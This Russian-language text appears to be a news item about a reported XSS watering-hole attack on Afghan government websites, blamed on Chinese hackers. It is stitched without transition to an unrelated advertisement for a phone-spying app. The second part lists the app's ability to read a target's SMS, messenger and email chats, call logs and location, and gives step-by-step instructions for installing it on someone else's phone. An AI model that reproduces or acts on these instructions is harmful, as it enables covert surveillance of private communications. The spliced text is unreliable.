Атакованы сайты правительства Афганистана

1411930983_383921968 Сотрудниками организации ThreatConnect Intelligence Research Team (TCIRT) был составлен отчёт о недавней XSS-атаке, которая была целенаправленно проведена против ресурсов афганского правительства. Как считают многие, причины кроются в стремлении китайских хакеров использовать сеть по доставке контента для распространения вредоносных Java-апплетов. Поскольку на территории Афганистана развитие Интернета находится на достаточно слабом уровне, там присутствует лишь одна сеть подобного рода. Через неё удобно заражать все ресурсы правительства, чем и попытались воспользоваться злоумышленники. В списке атакованных порталов перечислены Министерство иностранных дел, Министерство финансов, Министерство юстиции, Министерство по делам женщин. Также внимание злоумышленников привлекло посольство Австралии на территории Афганистана.

Проведение атаки watering hole во многом совпало со встречами политиков обеих стран. Обсуждались вопросы двустороннего сотрудничества, особенно в области торговли и промышленности. Именно снимок премьер-министра Абдуллы Абдуллы с главой правительства Китая Ли Кэцяном использовался в качестве плацдарма для пересылки вредоносного кода. Очень примечательный факт: хакерам потребовалось всего лишь несколько часов для модификации фотографии таким образом, чтобы она могла распространять XSS-вирус. С момента встречи прошло около двух часов, за это время злоумышленники сумели создать необходимый атакующий код. Или воспользоваться заранее подготовленным, что дополнительно свидетельствует о тщательном планировании акции.

Многие сходятся во мнении, что за атакой может стоять правительство Китая. Ведь Поднебесной очень выгодно расширять свою сферу влияния на другие государства, стремясь убрать из Афганистана военные базы западных стран. Как считают сотрудники TCIRT, именно эксплуатация сетевой инфраструктуры Афганистана могла бы с успехом использоваться спецслужбами Китая в планировании хакерских атак на любые цели, в каком бы уголке земного шара они не находились. А сайт правительства Афганистана – идеальная доверенная зона, которая может служить наилучшей точкой для входа. Таково содержание опубликованного доклада. Результативность атаки, равно как и степень повреждения сетевой инфраструктуры, не уточняется. Это может свидетельствовать о малых успехах хакеров.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.